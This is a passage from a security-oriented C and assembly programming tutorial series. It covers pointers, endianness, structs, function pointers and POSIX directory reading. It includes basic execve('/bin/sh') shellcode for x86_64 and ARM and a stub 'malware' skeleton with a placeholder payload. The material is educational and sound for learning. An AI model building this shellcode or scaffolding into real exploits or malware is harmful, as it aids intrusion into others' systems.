 25 | > utilization. When used in a configuration with a 32-bit bus, actual
 26 | > transfers of data between processor and memory take place in units of
 27 | > doublewords beginning at addresses evenly divisible by four; however, the
 28 | > processor converts requests for misaligned words or doublewords into the
 29 | > appropriate sequences of requests acceptable to the memory interface. Such
 30 | > misaligned data transfers reduce performance by requiring extra memory
 31 | > cycles. For maximum performance, data structures (including stacks) should
 32 | > be designed in such a way that, whenever possible, word operands are aligned
 33 | > at even addresses and doubleword operands are aligned at addresses evenly
 34 | > divisible by four. Due to instruction prefetching and queuing within the
 35 | > CPU, there is no requirement for instructions to be aligned on word or
 36 | > doubleword boundaries. (However, a slight increase in speed results if the
 37 | > target addresses of control transfers are evenly divisible by four.)
 38 | 
 39 | 
 40 | 
 41 | Summing up, try to program your processor using its native word size. It may look that you are wasting some space, but that is the right way to do it. 
 42 | 
 43 | I will just give a small hint on this topic before going on.
 44 | 
 45 | 
 46 | # An Example: Processor Word Size and Memory.
 47 | We have just said in the previous section that a 32bits processor will operate faster on a 32bit value and will also access faster a 32bits value in memory than a 16 bits one.
 48 | 
 49 | The first thing you can infer from that sentence is that, even if the smallest addressable value in memory is 8 bits (do you remember the size of our memory drawers from Part I?), a 32bits processor can read 32bits from memory at once.
 50 | 
 51 | This simple sentence has quite some concepts behind it. Let's go one by one
 52 | 
 53 | ## Simplified Memory Hardware Model
 54 | The memory system in a PC can be quite elaborated and it is beyond the scope of this course to go into those details, however, discussing a simplified model of the system memory will be beneficial for us.
 55 | 
 56 | In its simplest way, a memory chip provides the following pins... 
 57 | 
 58 | - `AX` pins usually known as Address pins (with X=0...WordSize-1)
 59 | - `DX` pins usually known as Data pins    (with X=0...WordSize-1)
 60 | - `Cx` pins usually known as Control pins. (depends on the processor)
 61 | 
 62 | The CPU also have similar `AX` and `DX` pins that are connected to the memory. This connection is not direct (we really need a bus between them), but for this simplified model we can consider that they are directly connected.
 63 | 
 64 | The control pins allows the _Processor_ to command the memory. In this group you will usually find: 
 65 | 
 66 | - `OE/CS` (Output Enable, Chip Select). These pins will, in a sense, _ACTIVATE_ the memory chip (either the input or the output). 
 67 | - `WR/RD` (Write, Read). These ones are used to tell the memory if we want to write into the memory or to read values from it.
 68 | 
 69 | So, whenever the CPU wants to read a value from the memory, it puts the value of the address to access in its address pins (`AX`), which are connected to the memory `AX` pins, usually by a bus. Then, the right control signals are asserted in the memory chip, and it will put in its `DX` pins the value in the memory address indicated by `AX`.
 70 | 
 71 | OK, let's put some numbers to better understand this:
 72 | 
 73 |     ----+                          +-----------
 74 |         +- A0 ---------------  A0 -+
 75 |         +- ... -------------- ... -+
 76 |     CPU +- A31--------------- A31 -+  Memory 
 77 |         +- ...                     |
 78 |         +- D0 ---------------- D0 -+
 79 |         +- ... -------------- ... -+
 80 |         +- D31 -------------- D31 -+
 81 |     ----+                          +------------
 82 | 
 83 | Imagine that the `RIP` register (do you remember the Instruction Pointer?), is pointing to address 4, so, the instruction on address 4 is the next one to execute. The CPU has to read from memory that instruction, so it puts in the address bus the value
 84 | 
 85 |     33222222222211111111110000000000
 86 |     10987654321098765432109876543210
 87 |     --------------------------------
 88 |     00000000000000000000000000000100
 89 | 
 90 | Only pin `A2`  will be set. That actually means address 4. So, these pins are also connected to the memory. Whenever the `RD` control signal is activated in the memory, the chip will access address 4 and put in `D0` to `D31` the value stored at that position.... Remember this is a simplified model... a lot more things goes on when accessing memory.
 91 | 
 92 | Then, the memory will put the value of address 4 in `D0-D7`. As each memory position is 8 bits, we only need 8 physical pins to send the value to the CPU. But using only those would be a huge waste. In general, the memory will not put only 1 byte in the `Dx` lines, it will put as much as it can... in this example it means that it will output 4 bytes, starting from address 4, using the 32 `Dx` signals in the bus.
 93 | 
 94 | _Again, this is a simple example. Sometimes, your memory only has a data bus 8 bits long and multiple memory chips are used to access 16, 32 or 64 bits words... in those cases, there is a real physical constraint with regards to memory aligned accesses. These little things are the ones that make a difference between two systems._
 95 | 
 96 | 
 97 | ## CPU Native Word Size
 98 | As you can imagine by now, there is a relation between the processor and the rest of the computer with regards to this native word size. A 32bits processor will interface to a _32bits memory system_ (is not that straightforward, but roughly that is what happens and, when it says _system_ it may actually be saying several chips). 
 99 | 
100 | Now, imagine that you want to just read a byte. You put your address in the `Ax` lines and ask the memory chip to spit the content of that address. The memory chip will put in the `Dx` the content of that address you request plus the 3 next addresses. The CPU will then read those 4 bytes from the bus and... just get the lower 8 bits from that value. In a sense, that requires something extra to do than just reading the whole 32bits value into our 32bits register. You see what I mean? (in this case it is just discarding 3 out of the 4 bytes)
101 | 
102 | This becomes a bit more tricky if instead of a 32 bits memory chip you use four 8 bits memory chips. For instance, check the Intel processors datasheets. From the 80386 on, you will see that the lower bits of the address are not directly mapped to these `AX` pins. You have to look for `BE#X` pins or `REQ#X` depending on the processor version.
103 | 
104 | As you can see, what I have described is just a very simplified example to illustrate how a processor works in a more efficient way when it only has to deal with its native internal word size. The reality is more complex and, unless you need to design your own computer (the motherboard at least), it does not really matter (especially with the large cache memories nowadays). 
105 | 
106 | 
107 | ## Little/Big Endian
108 | So, now, we'll always try to read data from memory using the native word size of our processor (not really but the compiler will do that for us). Let's assume the native word size is 4 bytes (32bits processor). The question now is: How are those bytes mapped between the memory and our registers?.
109 | 
110 | Let's assume the following memory layout:
111 | 
112 | 
113 |     |  ...   | Drawer ...
114 |     +--------+
115 |     |  0x44  | p +  3
116 |     +--------+
117 |     |  0x33  | p + 2
118 |     +--------+
119 |     |  0x22  | p +  1
120 |     +--------+
121 |     |  0x11  | p
122 |     +--------+
123 | 
124 | Let's assume too, that we want to read the content of address `p`, in register `eax`. Which value do you think you will get in the `eax` register?
125 | 
126 | `0x44332211` or `0x11223344`
127 | 
128 | The answer is: it depends. It depends on your processor. If your processor is `Little Endian` you will get the first value. Otherwise, if your processor is `Big Endian` you will get the second value. We have met the `Endianness`.
129 | 
130 | In general, you do not care about your processor Endianness. You just write and read your values to/from memory and the processor will do the right thing. Endianness becomes important when you have to interchange data with computers that may have a different endianness. This happens very often in network programming when using Open protocols that have to work with any kind of machine. 
131 | 
132 | Enough introduction. Let's see how all these concepts can be of any practical use.
133 | 
134 | # Pointers
135 | LoL. You may be thinking: _OMG!, this guy is gonna kill me. Everybody says that pointers are the most tricky part of C programming and he is just starting with this. Really, man, I give up_.
136 | 
137 | OK guys. Do not give up. You will see in a sec that this is a lot simpler than you think. Furthermore, if you are doing assembly programming... well, you cannot do much without using pointers.... Just repeat to yourself:  I have to go through this to finally understand those shellcodes everybody talks about... Repeat it again... again... are you ready now?
138 | 
139 | So, what is a pointer again?. A pointer is just a position of memory that contains the address of another position of memory. :dizzy_face:
140 | 
141 | The first thing you may figure out from that cryptic recursive definition is that a pointer has to have a size equal to the number of `Ax` pins in the processor. In other words, it has to have the size of the address bus of the processor.
142 | 
143 | In plain words: a 32bits processor with a 32bits address bus (i.e. an Intel 386) will require 32bits to store any potential memory address any program can ever reference. The same goes for a 64bits processor with a 64bits address bus: a pointer will need 8 bytes to reference any possible memory address. In this last case, for a 64bits processor, we need 8 bytes to cover every possible value the processor can output in the address bus (the so-called addressing space) and therefore a pointer is stored in 8 consecutive address positions. (Again, this can become a bit more complicated in reality, but this concept is enough for now).
144 | 
145 | Let's see this with an example. Imagine the following memory layout:
146 | 
147 | 
148 |     |  ...   | p + 4 = 0x400004
149 |     +--------+
150 |     |  0x40  | p + 3 = 0x400003
151 |     +--------+
152 |     |  0x00  | p + 2 = 0x400002
153 |     +--------+
154 |     |  0x00  | p + 1 = 0x400001
155 |     +--------+
156 |     |  0x04  | p     = 0x400000
157 |     +--------+
158 | 
159 | The example above shows a 32bits pointer at address 0x400000 pointing to address 0x400004 on a 32bits little endian machine. A memory address storing a memory address.
160 | 
161 | # Hello World
162 | _"Fine, all that stuff is really confusing. Give me an example to understand what you are talking about..."_ Sure, there you go, the _Hello World_ program.
163 | 
164 | I'm pretty sure you know the "Hello World" program, but in case you don't, this is a very simple program that shows the message "Hello World" in the console. 
165 | 
166 | The way to do this on Linux is to write to the **standard output** (the console). The standard output is known by the system as the file descriptor `1` for any process... We will go in detail on file descriptors later in the course, for now, you just need to know that if you pass `1` as first parameter to the system call `write` you will be writing to the console.
167 | 
168 | So, knowing that the `write` system call is known by Linux as 1 (on a x86_64 arch), and applying everything we have already learned, this is what our little program will look like:
169 | 
170 | ```nasm
171 | 	global _start
172 | _start: mov rax, 1    ; SYS_write = 1
173 | 	mov rdi, 1    ; fd = 1
174 | 	mov rsi, msg  ; buf = msg 
175 | 	mov rdx, 13   ; count = 13 (the number of bytes to write)
176 | 	syscall  ; (SYS_write = rax(1), fd = rdi (1), buf = rsi (msg), count = rdx (13))  
177 | 
178 | 	;;  Exit program
179 | 	mov rax, 0x3c  ; SYS_exit = 0x3c
180 | 	mov rdi, 0     ; status = 0
181 | 	syscall ; (SYS_exit = rax (0x3c), status = rdi (0))
182 | 	
183 | msg:	db 'Hello World!',0x0a  ; 12 characters + newline (0x0a) = the 13 bytes written above
184 | ```
185 | 
186 | I hope you can identify the two system calls in there. The first one to write the message, and the second one to exit the program with status 0.  If you do not know how to compile the program, you need to go back and check Part I of this course.
187 | 
188 | # Labels and Assembler commands
189 | There are two new elements in our tiny program. The first one is a label. A label is a name we can use to reference a part of our program (actually a memory position). In this case, the label `msg` is used to reference some data in memory, our "Hello World" message. In general, we do not know where in memory our program will be loaded, so using symbolic names let us write our programs without caring about that. Even if we use offsets to reference memory positions independently of our actual location in memory, labels will let us ask the compiler to calculate those offsets for us.
190 | 
191 | Actually, we've already seen this in the past.... can you spot the label we have been using so far? ... Anybody `_start`?
192 | 
193 | The second thing is that `db` instruction in the program. That is not a processor opcode, but an assembler instruction. Assembler instructions are only understood by the assembler, and do not directly translate into opcodes in the program. We already know one of those assembler instructions... Yes `global`.
194 | 
195 | The `db` assembler instruction probably stands for `Data Byte` (TBH I do not know for sure). It allows us to set some memory area with a sequence of bytes. In this case we can see two parts in the `db` instruction. The first part is a string. The assembler will output one byte per char starting at position `msg`. Then we can see an extra byte, separated by a comma, and expressed in hexadecimal. Sure, you can just put the decimal value (`10`) there and everything will stay the same. You can also write your string as a list of the ASCII values for each character separated by commas... but that is not very practical.
196 | 
197 | So, in this little program, where is our pointer?. We said that a pointer is a memory address that contains a memory address. In this case, the memory address is actually a register, specifically the register `rsi`. Do you remember that we said registers are just very fast memory within the processor that are referenced by a name?... well, if you are more comfortable changing the definition above to specifically also talk about registers that's fine. Anyway, I hope you have seen the point... er! ;)
198 | 
199 | # A C version
200 | Let's now try to write the C version for this program. It would look like this:
201 | 
202 | ```C
203 | #include <unistd.h>
204 | 
205 | int main ()
206 | {
207 |         register void *p = "Hello World!\n";
208 |         write (1, p, 13);
209 |         _exit (0);
210 | }
211 | 
212 | ```
213 | 
214 | Again, we can easily identify the two system calls in the program ( `write` and `_exit`). We already know that the second parameter to write has to be a pointer, a memory address containing the address, in memory, to the string to print. Let's take a look to the assembly generated by `gcc`:
215 | 
216 | 
217 |     $ objdump -d -M intel hello
218 |     (...)
219 |     0000000000400544 <main>:
220 |       400544:	55                   	push   rbp
221 |       400545:	48 89 e5             	mov    rbp,rsp
222 |       400548:	53                   	push   rbx
223 |       400549:	48 83 ec 08          	sub    rsp,0x8
224 |       40054d:	bb 5c 06 40 00       	mov    ebx,0x40065c
225 |       400552:	ba 0d 00 00 00       	mov    edx,0xd
226 |       400557:	48 89 de             	mov    rsi,rbx
227 |       40055a:	bf 01 00 00 00       	mov    edi,0x1
228 |       40055f:	e8 dc fe ff ff       	call   400440 <write@plt>
229 |       400564:	bf 00 00 00 00       	mov    edi,0x0
230 |       400569:	e8 c2 fe ff ff       	call   400430 <_exit@plt>
231 |     (....)
232 | 
233 | 
234 | Let's skip the first 4 instructions (that's the stack stuff that we haven't discussed yet), and let's try to find our pointer... Have you spotted it?
235 | 
236 | Sure, you see how do we copy `rbx` into `rsi` after setting `ebx` (the 32bits part of `rbx`)  to `0x40065c`... and what is in there?... Let's check it
237 | 
238 |     $ gdb ./hello
239 |     (gdb) x/s 0x40065c
240 |     0x40065c:	 "Hello World!\n"
241 | 
242 | _Note: You have to run all commands above. You may get different addresses in your system_
243 | 
244 | # C pointers
245 | I guess you have already figured out how to declare a pointer in C. Sure, you have to use the `*`. However, in C we need to specify types. In this specific example it does not really make a difference, but in the general case the pointer type is important and useful.
246 | 
247 | A C pointer is, therefore, declared this way:
248 | 
249 | ```C
250 | type *pointer;
251 | ```
252 | 
253 | This declares a pointer to a memory address containing a value of a certain type. So... which types does C know? This is the list:
254 | 
255 |     char     Byte                 Minimal addressable element (not necessarily 8 bits)
256 |     int      Integer              Default integer type
257 |     short    Integer              Usually half of the default integer or equivalent to int
258 |     long     Integer              Usually double of the default integer or equivalent to int
259 |     float    Floating Point       Single Precision Floating Point   
260 |     double   Floating Point       Double Precision Floating Point
261 |     void     Nothing              Nothing or Anything
262 | 
263 | C also supports compound types, but we will not talk about those right now.
264 | 
265 | Confused again?. This is a simple program to figure out the size of each type in your system and better understand the difference between all those types:
266 | 
267 | ```C
268 | #include <stdio.h>
269 | int main ()
270 | {
271 | 	printf ("Size of void*  : %ld\n", sizeof(void*));
272 | 	printf ("Size of short  : %ld\n", sizeof(short));
273 | 	printf ("Size of int    : %ld\n", sizeof(int));
274 | 	printf ("Size of long   : %ld\n", sizeof(long));
275 | 	printf ("Size of float  : %ld\n", sizeof(float));
276 | 	printf ("Size of double : %ld\n", sizeof(double));
277 | 	return 0;
278 | }
279 | ```
280 | 
280 | The `stdio.h` at the beginning is required to use the function `printf`. The function `printf` (PRINT Formatted) lets us print messages using format strings to compose complex outputs. In this case, we are using the `%ld` format string to print the value returned by `sizeof` as a long (strictly speaking `sizeof` yields a `size_t`, whose portable format specifier is `%zu`; `%ld` works on 64-bit Linux because both types have the same size there). This basically tells `printf`, I have a number here that I want you to convert into a string... please do it.
282 | 
283 | We can add many of those `%` in the format string and provide additional parameters to the function to fill them. Check the `printf` man page for details about the format strings you can use with `printf`.
284 | 
285 | Finally, as you can imagine, `sizeof` returns the size, in bytes, of a given type or variable. 
286 | 
287 | In our test program we used a `void*` variable. This is a pointer to `void` which, for a pointer, means a raw pointer or a pointer to anything. This is actually the C equivalent to the assembly pointer we used in our ASM code.
288 | 
289 | We will come back to the C pointers later to fully understand the implications of pointer's type. But I think this is enough for now
290 | 
291 | # Your First Shellcode
292 | So, believe it or not, you have already learned all the bits and pieces to write a very basic shellcode.  A shellcode, in its simplest form, is a piece of code that starts a shell. It is usually fed into a vulnerable program using an exploit, effectively enabling the attacker to acquire a shell with the same privileges of the vulnerable program. In general an attacker will be targeting processes running as `root` to get full access to the machine.
293 | 
294 | In Linux, you can execute a process using the `exec` system call (its actual name is `execve`). This system call has 3 parameters, but for your first shellcode you can set to 0 the last two. The only parameter we need is the first one... a pointer to the name of the program to run.... that in this case would be `/bin/sh`.
295 | 
296 | ```nasm
297 | section .text
298 |         global _start
299 | 
300 | _start:
301 |         mov rax, 0x3b           ; SYS_exec
302 |         mov rdx, 0              ; No Env
303 |         mov rsi, 0              ; No argv
304 |         mov rdi, cmd            ; char *cmd
305 |         syscall
306 | 
307 | cmd:    db '/bin/sh',0
308 | 
309 | ```
310 | 
311 | Wow!... it is roughly the same program as the `Hello World` we wrote before!!!!. Are you missing the `exit` system call?... take a look at the exec man page (`man 2 execve`) to know why we do not need it any more.
312 | 
313 | ## `/bin/sh`
314 | You may be wondering: why `/bin/sh`?. I always use `bash`, or `dash`, or `zsh`, or `ksh`,...  Sure, you can run many different shells (command interpreters) but in almost any Unix out there, independently of the actual shell you usually use, you always will have `/bin/sh`. In general, it is a soft link to a real shell.
315 | 
316 | The reason for this, at least one of them, is that the system runs a lot of shell scripts for doing different things. You have shell scripts executed during the boot process, whenever you start or stop a service, when you launch some applications,... Imagine that whenever a user wants to change its default shell, the system will have to update all those scripts... what about the ones you wrote on your own, those the system knows nothing about... they will just break.
317 | 
318 | Therefore, as a convention, all Unix systems have a binary at `/bin/sh` that runs a shell and all shell scripts rely on the existence of that file... Well... not all Unix systems. Keep reading.
319 | 
320 | 
321 | # ARM Shell code
322 | So, we should be able to port our x86_64 asm shell code to ARM very easily. In case you are feeling lazy, this is how it may look like.
323 | 
324 | ```nasm
325 | .text
326 | .globl _start
327 | 
328 | _start:	mov r7, #11
329 | 	mov r1, #0
330 | 	mov r2, #0
331 | 	ldr r0,=msg
332 | 	swi #0
333 | 
334 | 
335 | .data
336 | msg:
337 | 	.asciz "/system/bin/sh"
338 | ```
339 | 
340 | Have you seen it?... Sure, this code is for Android. Android has messed up the standard Linux disk tree, and the default shell is no longer at `/bin/sh` but at `/system/bin/sh`. If you are going to test the code on another ARM platform such as a BeagleBone Black, a BananaPi or an Olinuxino running a standard Linux distro (usually Debian), just change the string to the well-known location `/bin/sh`. The rest of the code should just work.
341 | 
342 | We can compile it like this:
343 | 
344 |     $ arm-linux-gnueabi-as -o sh-arm.o sh-arm.s
345 |     $ arm-linux-gnueabi-ld -o sh-arm sh-arm.o
346 | 
347 | Let's take a closer look at the code. Did you notice it?. Yes, there are some differences when compared to our Intel code. This is for two reasons. The first one is that `NASM` only produces code for Intel processors, so we cannot use it for ARM. You should have noticed this before... I'm amazed nobody has asked about this in the previous parts. Anyways, the syntax of the GNU assembler (`as`) is slightly different. This one is known as AT&T assembly whereas the one used by `NASM` is known as Intel assembly... As a wannabe hacker you should learn both :P
348 | 
349 | So, the GNU assembler uses the assembler instruction `.asciz` to add a zero-terminated ASCII string to the memory. It is the same thing that the `nasm` `db`, but automatically adding the 0 at the end. The second comment is that we have to use `ldr` to load our pointer in our `r0` register.
350 | 
351 | Well, `ldr`, when used with the `=value` form as above, is an ARM __pseudo-instruction__. The bottom line is that you cannot directly load 32bits values into a register in an ARM processor. I will not go into the details (you can google it), but roughly, ARM produces a very compact machine code, and tries to encode a lot of information on each 32bits machine code word, including the mnemonic parameters. This limits the size of the values that can be directly loaded into a register. The `ldr` pseudo instruction is expanded by the assembler into the right sequence of instructions to load a 32bits value in a register. There are more pseudo-instructions for ARM and we will go through them as needed.
352 | 
353 | The conclusion of all this is that, for ARM you have to use the syntax above to load a 32 bits constant or address (which in practical terms are the same thing) into a register.
354 | 
355 | # MIPS
356 | OK guys. My MIPS setup is so crappy that it is a pain to keep including it in this course. If any of you wants to contribute this section, just let me know. Until I get this development environment sorted out I will skip the MIPS sections from now on.
357 | 
358 | 
359 | # Conclusions
360 | In this part we have had our first encounter with pointers at the lowest level and we have learned how to use them together with a system call. Using these two simple concepts we managed to create a shell code. This shell code is not usable in the wild, but you will learn how to update it for practical purposes later in this course. If you cannot wait, check the @unh0lys0da   article here https://0x00sec.org/t/linux-shellcoding-part-1-0/289 or read the classical "Smashing the Stack for Fun and Profit" from Aleph one!
361 | 
362 | * PREVIOUS: [Programming for Wannabes. Part II and a half. Systemcalls (ARM and MIPS)](part-02.5.md)
363 | * NEXT: [Programming for Wannabes. Part IV. The Stack](part-04.md)
364 | 
365 | 


--------------------------------------------------------------------------------
/part-07.md:
--------------------------------------------------------------------------------
  1 | # Programming for Wannabes VII. Finding files I
  2 | It is time to get started with more advanced code. We will be introducing multiple concepts from this point on and hopefully we will boost our programming skills in no time. In the previous instalment we identified the ability to find files in the disk as a feature required by several malwares.
  3 | 
  4 | Actually it is a feature required by many other applications and will let us learn about new system calls, loops and structures. Without further ado, let's jump into the topic
  5 | 
  6 | # Getting Ready to Read directories
  7 | Whenever you need to read the content of a folder and you want to be portable between platforms, the right way to proceed is using the POSIX interface.
  8 | 
  9 | I will first dump here a shrunk-down version of the general program from the [previous instalment](https://0x00sec.org/t/programming-for-wannabes-part-vi-malware-introduction/25595/). In the rest of this text we will just work out the `select_target` function. Everything else will stay the same for the time being. So, this is our starting point:
 10 | 
 11 | ```C
 12 | #include <stdio.h>
 13 | #include <stdlib.h>
 14 | #include <string.h>
 15 | #include <errno.h>
 16 | 
 17 | #include <sys/types.h>  // POSIX directoy reading interface
 18 | #include <dirent.h>
 19 | 
 20 | char *the_folder="/tmp/";
 21 | 
 22 | typedef int (*PAYLOAD_FUNC)(char *);
 23 | 
 24 | int payload (char *target) {
 25 |   printf ("Doing malware things to %s\n", target);
 26 | }
 27 | 
 28 | int select_target (PAYLOAD_FUNC pf) {
 29 |   return 0;
 30 | }
 31 | 
 32 | int main () {
 33 |   while (select_target(payload));
 34 | }
 35 | ```
 36 | 
 37 | No big surprises here, a bunch of include files with the functions and data structures we will need and the functions we introduced for our generic malware. The only tricky thing here is the definition of a function type. I introduced this silently in the previous instalment, but this time we should look deeper into this so you understand what we are doing.
 38 | 
 39 | ## Function Pointers
 40 | One of the data types that we can use in C are the so-called pointers. We had introduced them earlier in this series, but for completeness let's quickly define them again: a pointer is just a variable that contains a memory address. It is said that it _Points to_ that address, hence the name... _Pointer_.
 41 | 
 42 | Usually pointers point to addresses containing data (variable pointers), but there is no reason why a pointer wouldn't point to an address containing code... a function for instance. In assembly this is very straight forward, we just need to do `call/jmp` with some kind of indirect addressing (that is, using a register or variable that contains the address to jump into, instead of the direct address, so we can control that value programatically). Let's see this with an example
 43 | 
 44 |     DIRECT                 INDIRECT
 45 |                            mov    payload, %rax
 46 |     call payload           callq  *%rax
 47 | 
 48 | 
 49 | In the direct code we are using the `payload` address directly. In the indirect code we load the function address in a register and then we jump to the address stored in that register. In general, when you declare a function pointer variable, that pointer will be stored somewhere in the stack, and instead of loading the address directly on `RAX` (like in this example), we will load `RAX` with that stack value. 
 50 | 
 51 | Let's change the `select_target` above to actually call `payload` and let's take a look at the generated code:
 52 | 
 53 | ```C
 54 | int select_target (PAYLOAD_FUNC pf) {
 55 |   pf (the_folder);
 56 |   return 0;
 57 | }
 58 | ```
 59 | 
 60 | This produces the following assembler. You have to compile it with `-O2` so the code gets slightly optimised, otherwise, gcc will generate code to store the parameter (the function pointer) in the stack and just after that read that stack value and put it in `RAX`. In other words it just moves the parameter around doing nothing.
 61 | 
 62 | ```asm
 63 | 00000000000006c0 <select_target>:
 64 |  6c0:   48 83 ec 08             sub    $0x8,%rsp
 65 |  6c4:   48 89 f8                mov    %rdi,%rax
 66 |  6c7:   48 8b 3d 42 09 20 00    mov    0x200942(%rip),%rdi        # 201010 <the_folder>
 67 |  6ce:   ff d0                   callq  *%rax
 68 |  6d0:   31 c0                   xor    %eax,%eax
 69 |  6d2:   48 83 c4 08             add    $0x8,%rsp
 70 |  6d6:   c3                      retq
 71 | 
 72 | ```
 73 | 
 74 | We already know all this, but let's refresh our minds once again:
 75 | 
 76 | * We get our parameter (the `payload` address in this case) in `RDI`
 77 | * We copy it into `RAX`
 78 | * Put the `the_folder` variable in  `RDI` (remember `RDI` contains the first parameter)
 79 | * Run the function indirectly (jump to the content of `RAX` that in this case is `payload`)
 80 | 
 81 | So, that's it. In this case we are using the pointer directly, but we could store it in memory and then we will be talking about a function pointer variable. This is obvious and straightforward in asm, but in C we need to use a kind of cryptic way to define function pointers:
 82 | 
 83 | ```C
 84 | return_type (*var/type) (parameters);
 85 | ```
 86 | 
 87 | So you just need to put parenthesis (and an `*`, after all we are defining a pointer) around the variable or type that you want to define. Let's see a few examples:
 88 | 
 89 | ```C
 90 | int (*func)(int, int);
 91 | ```
 92 | This declares a variable named `func` that is a pointer to a function returning an integer, and expecting two integers as parameters. 
 93 | 
 94 | ```C
 95 | typedef int (*FUNC)(int, int);
 96 | FUNC func;
 97 | ```
 98 | 
 99 | This renames a function pointer type (that is what `typedef` does) to represent the same function we defined above. Then it declares the same variable but using the new type name. This makes the code more readable, but other than that, there is no difference at all.
100 | 
101 | Also note that the assembler generated to call our function (via the function pointer) is independent of the actual types in the declaration.... you can call the function with whatever you want... but the function will likely not work as expected, or even crash. The type definitions are just used by the compiler to let us know that we are doing what we are supposed to do. Just change the type definition and recompile, you will get the same code.
102 | 
103 | 
104 | # Reading a directory the POSIX way
105 | 
106 | Now we can get back to the main topic, how to read the content of a directory. Remember, virus, ransomware, spyware, all of them need to scan the disk to find different types of files. Let's see how to do this.
107 | 
108 | We will start doing it the _Right Way_, that is, how it is expected to be done by any normal system application. And that is using the POSIX interface that is composed of three functions:
109 | 
110 |     opendir  Opens a directory for reading
111 |     readdir  Read one directory entry each time it is called
112 |     closedir Closes the directory
113 | 	
114 | This API is intended to mimic the normal file interface (the stream like interface offered by `fopen/fread/fclose`), but just using slightly different data structures. Using these functions our `select_target` function will look like this:
115 | 
116 | ```
117 | int select_target (PAYLOAD_FUNC pf) {
118 |   struct dirent *de;
119 |   DIR           *d;
120 |   
121 |   if (!(d = opendir (the_folder))) {perror ("opendir:"); exit (EXIT_FAILURE);}
122 | 
123 |   while (1) {
124 |       errno = 0;
125 |       if (!(de = readdir (d))) {
126 | 	    if (errno) perror ("readdir:");
127 | 	    break;
128 |       }
129 |       pf (de->d_name);
130 |     }
131 |   closedir (d);
132 |   return 0;
133 | }
134 | ```
135 | 
136 | The first thing to note is that `DIR*` is the type used by all the functions; it is similar to the classical `FILE*` that we use with files (when using the stream interface). Conceptually it is the same, a stream abstraction of a directory. The `opendir` and `closedir` are intended to initialise the structure and to finish the processing respectively (and release resources). Not much more to say about them, you need to call `opendir` before you start reading the directory, and you have to call `closedir` whenever you are done processing your folder. Yes, the parameter to `opendir` is just a string containing the folder to process. We will see later what those functions really do under the hood.
137 | 
138 | The interesting function is `readdir` that is the one that actually reads directory entries one by one.
139 | 
140 | # `structs`
141 | Before looking into `readdir` in detail, we need to introduce a new C keyword: `struct`. A `struct` is a so-called compound type. It is a compound type because it is composed of other types. Each one of those types together with the name we give to them is known as a field. You can think about a `struct` like a variable that groups more variables together in a convenient way.
142 | 
143 | The way to declare them is like this:
144 | 
145 | ```C
146 | struct name_of_the_struct {
147 |   type1  field1;
148 |   type2  field2;
149 |   ....
150 | };
151 | ```
152 | 
153 | A more specific example could be:
154 | 
155 | ```C
156 | struct linux_dirent {
157 |   long           d_ino;
158 |   long           d_off;
159 |   unsigned short d_reclen;
160 |   char           d_name[];
161 | };
162 | 
163 | struct linux_dirent de,*pde;
164 | ```
165 | 
166 | The code above defines a new type named `struct linux_dirent` (note that you need to use `struct` to refer to the new type) composed of two longs (64bits integer), one short (16 bit integer) and a string of unknown size. You can add as many fields as you want, but in this case we are using only 4.
167 | 
168 | After the `struct` definition we have defined two variables. One is a `struct` and the other one is a pointer to a `struct`. Once the variables are declared, we can access the fields using the `.` for the struct one and the `->` operator for the pointer. Just like this:
169 | 
170 | ```C
171 | de.d_ino = 12345;
172 | de.d_off = 0;
173 | pde = &de;
174 | pde->d_ino = 54321;
175 | pde->d_off = 1;
176 | ```
177 | 
178 | Whenever you need to pass structs as parameters to function, it is usual to redefine them using `typedef`s in order to minimise the writing. Imagine a function that returns one of those `struct linux_dirent` structs and receives as parameter two of them. The prototype will look like:
179 | 
180 | ```C
181 | struct linux_dirent my_func (struct linux_dirent p1, struct linux_dirent p2);
182 | ```
183 | 
184 | This is a lot of writing and also it is harder to figure out the function prototype at one glance. Now imagine, you have 20 more function in your API to deal with this data type....So we could just create an _alias_ for this type:
185 | 
186 | ```C
187 | typedef struct linux_dirent LDIRENT;
188 | LDIRENT my_func (LDIRENT p1, LDIRENT p2);
189 | ```
190 | 
191 | Which is way easier to read. However this is a matter of personal taste. Both approaches will produce the same code. Some people prefer to write everything so it is always clear what that type is (a struct in this case), and others prefer to redefine them. In the standard C library you will find both.
192 | 
193 | _Note: It is not common (but indeed possible) to pass and return structs in C functions, usually you will use pointers instead. The reason is that C passes parameter by value. This means that all parameters we pass have to be copied. It is easier to copy 4/8 bytes for a pointer than the roughly 24 bytes required by the struct in our example._
194 | 
195 | All this may look  complicated at first glance, but you will get used to this very quickly. These data structures are all over the place when writing non trivial programs
196 | 
197 | However, in this course we are not just learning the syntax of C, we are going deeper.
198 | 
199 | # `structs` are just memory blocks
200 | So, what is really a `struct` ?. Short answer: It is just a memory block. When we declare a variable of type struct, we are just allocating enough space to contain all the struct elements either in the stack, in case our variable is local to a function, in the data segment, in case it is a global variable, or in the _Heap_ in case we allocate the memory block dynamically. This last case we will cover later in this course.
201 | 
202 | For our previous example we have:
203 | 
204 | ```C
205 | struct linux_dirent {
206 |   long           d_ino;      // 8 bytes
207 |   long           d_off;      // 8 bytes
208 |   unsigned short d_reclen;   // 2 bytes
209 |   char           d_name[];   // This is a placeholder we will talk about in a sec
210 | };
211 | ```
212 | 
213 | So, this structure requires 18 bytes, which will likely be rounded up to 24 bytes to keep the memory alignment (check previous instalments when we introduce the native word size). You can just add a `printf` using the `sizeof` operator to find out the actual size of the struct. In memory it will look like:
214 | 
215 | 
216 |     ADDR+18 -> | d_name
217 |     ADDR+16 -> | d_reclen (2 bytes) 
218 |     ADDR+8  -> | d_off    (8 bytes) 
219 |     ADDR   --> | d_ino    (8 bytes)
220 |                 +--------------
221 | 
222 | 
223 | When declaring a variable, such a variable just names that memory block... Think about it as a label, and therefore it is immutable (you cannot change its value). It is the same with arrays... they are like pointers but not completely (we will talk about this again when arrays pop up in our way later in the course).
224 | 
225 | When you declare a pointer to a struct, you are just allocating memory to store an address that will point to a memory block. Note that when declaring a pointer to a structure, the structure is not magically created. It is just a pointer. You need to allocate the memory block for the structure by other means.
226 | 
227 | You can now add the `struct` we defined above to your program (we will do that in a sec) and declare a local variable in the `select_target` function. Then take a look at the generated code. The beginning of the function will allocate extra space (the `sub $0xVAL,%rsp` at the beginning) to accommodate the new variable.
228 | 
229 | # What about the `d_name` field?
230 | 
231 | Many of you may be wondering this.... what does that `char d_name[]` mean? Well, it is actually a placeholder. A field added to the `struct` to point to whatever comes after the rest of the fields. Or to get access to a specific point inside the struct if you prefer. This technique is used when the programmer needs to deal with variable length items. 
232 | 
